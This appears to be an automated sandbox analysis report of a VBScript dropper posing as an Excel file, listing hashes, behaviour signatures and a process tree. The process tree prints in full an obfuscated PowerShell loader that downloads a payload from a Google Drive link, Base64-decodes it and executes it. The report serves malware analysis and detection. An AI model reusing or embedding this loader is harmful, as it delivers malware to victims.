Analysis
-
max time kernel
136s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
16-05-2024 14:28
General
-
Target
Solicitud de oferta.xlsx.vbs
-
Size
429KB
-
MD5
9a509f7b5c066681e30a9f0d460375e3
-
SHA1
1de410352842ad3e9564579ad311ccfc1892cb91
-
SHA256
3d20bb55c63e72fe100bd9b8a8731fe4940b39091f3c8d4812cd456f0a47c459
-
SHA512
b3115fc12c6538130fa941c36b3427c68b43f85b9698769c0d44c70e66129429fda9e4743918ce9259a206dd8483edcefc12face45e31e2c9c4b5736e1ac6ffa
-
SSDEEP
12288:1iJv0ayfOb64MRycngoavbN0vBrbelwuL:1IvBCngoKyYau
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud de oferta.xlsx.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kalkulerede = 1;$Fortsttelserne='Su';$Fortsttelserne+='bstrin';$Fortsttelserne+='g';Function Pseudoperspective($Fomes){$Fornemmende=$Fomes.Length-$Kalkulerede;For($Haiduck=1;$Haiduck -lt $Fornemmende;$Haiduck+=2){$Reboiled+=$Fomes.$Fortsttelserne.Invoke( $Haiduck, $Kalkulerede);}$Reboiled;}function Tvivlraadigstes($Albylens155){.($Forureningsfrit) ($Albylens155);}$Tryllebind=Pseudoperspective 'PM,o.zKi,lTlKa / 5V..0A ,(GW.i n d oMwSsS N TE F1 0,. 0G;F KW i,nF6 4A; x 6S4.; r vT:,1 2 1..H0 )U ,GVeHc,k,o./O2B0M1B0G0.1S0 1r F iMr e fIoTxM/J1.2B1 ..0 ';$pseudos=Pseudoperspective ' U.see,r.-SARgMe ngtS ';$Experimented=Pseudoperspective ',h tSt p,s :./P/.d r.i vSe .UgBo,o.gPlKe ..c oOm /cu c.?,e,x.p o,r,tD= d.oDw nRlToBaId & i.dS= 1.o ISyKO TSJ p I.s g dVA.V,OT3.bUfSj.w oIHDmKi,KTl.bOh e 7DIFqSaA ';$Fakses=Pseudoperspective '.> ';$Forureningsfrit=Pseudoperspective 'SiCeRxJ ';$Lodestar176='monotheism';Tvivlraadigstes (Pseudoperspective 'FS,ePtR-PCFoKnUtTe.nStA .-jPHaNt hh gT,: \SUSiSrSiBnNaa.It x tK K- VTa lBu,e P$PL oLdPe sBtDa.rF1a7,6K; ');Tvivlraadigstes (Pseudoperspective 'FiSfP (Pt eHs tL-SpPa tTh .T :P\FU.ifrJi n aT.Jt xTtV).{Cehx iCtO} ;B ');$Bengals = Pseudoperspective '.e.c h o, %.a p p d a t aL% \IS.n aEpAs h a,r,e . M.y s ,& &U e,c hNoS ,$ ';Tvivlraadigstes (Pseudoperspective 'R$Sg.l o,bfa l.:SF i nOkfuAl tSuKr = ( cImCdA /.c. P$ B e,n gHa lPs,)D ');Tvivlraadigstes (Pseudoperspective 'A$.gLlDo b aUlA:AA lBp.h.o n s eS= $ ECx.p.eErRi m,eSnCtTe,dA.Ss p.lNi t (.$.FTa k s,eKsM)S ');$Experimented=$Alphonse[0];Tvivlraadigstes (Pseudoperspective 'M$RgWlPo bSaMlH:,K.a rMt o,t eFk sMosp gCaAv.e nOsr=UNKeBw -.OSbLjRe.c tH SGy s tTeamH..NFePt .PW e bSCOl i eOnstB ');Tvivlraadigstes (Pseudoperspective ' $ KRa.r tSoLtOe.k s oLp gSaKv eDnNs.. H e a.d,eSr.s.[A$.pBsSeGuldPo,s ]H=M$FT,rLyPl l,e b ignDdS ');$Husvale47=Pseudoperspective ' K,aTrMt,oPt.eRk sTo pGgHa vSe,n,sP.NDTo w n l oPa.d.F i l,eR( $.EBxTpReSrFiCmAe n tAe d,,M$SSHiFlBl iLb uHb,s )K ';$Husvale47=$Finkultur[1]+$Husvale47;$Sillibubs=$Finkultur[0];Tvivlraadigstes (Pseudoperspective 'v$ gLl,o b,aElD: U dFvPlBg,eMl,sPe =D(QT e s tT-JP aWt.hS $,SWi l l i bmuubSs.)i ');while (!$Udvlgelse) {Tvivlraadigstes (Pseudoperspective ' $HgSlFo.bsabl :PS.kSiSlOlEe lPiDnBjSeSrFs = $HtOr u eS ') ;Tvivlraadigstes $Husvale47;Tvivlraadigstes (Pseudoperspective ' S tWa rDtD- SvlFe,e.p k4U ');Tvivlraadigstes (Pseudoperspective 'H$TgSlGoDbSa.l,:sUMd.vVlGgce lSsae =,( TPeTs,tI-UP a tUhT M$TS.iClNlTiKbHu,b s.)S ') ;Tvivlraadigstes (Pseudoperspective ',$dgOl,o bHa l :CF o.xUlFy =O$sgSlEoDb aTlE:TS,o.uMp.eLr eSs,+,+D%G$.ACl pNhKoEn s,e..,cUo.uInBtI ') ;$Experimented=$Alphonse[$Foxly];}$Cataphoria=318333;$Beslaglgningerne=25185;Tvivlraadigstes (Pseudoperspective ' $.gIl oFb a lA:RS,t o l,eBmBa g e r nseSsC U=H MGTeWt -rCQoGn,tEe,n tp E$,SUi,lHl iIb.u b.sT ');Tvivlraadigstes (Pseudoperspective ' $CgClOoTb aTl : TVr uGs t oFro = P[KS y sat.e,m . CAoSn,v e r,tU]N: :HF rMo m B.a.swe 6,4US tLrPi n,gS(A$NS,tPo lne m aTg eErCnBe s )I ');Tvivlraadigstes (Pseudoperspective 'K$ gHlCoFbtaRl :.U.n,w oIr,kSeJdsn eLs sP .= u[.SBy sUtSeJmT. TSe xPtS.,ELnMc,o.d i,nTgS],:C:AA,StC IMI..SG eAtBS.tCr iMn.gC( $ T rMuMs t oHr,), ');Tvivlraadigstes (Pseudoperspective 'F$RgCl o bDaJlF: SDqFu i l lDaTsP= $ U n w o r k esd nUe s s,.Fs uMbSs tAr.i.nPgR( $OC.a tBa pRhPomr iNa ,I$SB,eDsblMa g,l gbn iFn gLe r nAe,)B ');Tvivlraadigstes $Squillas;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snapshare.Mys && echo $"3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB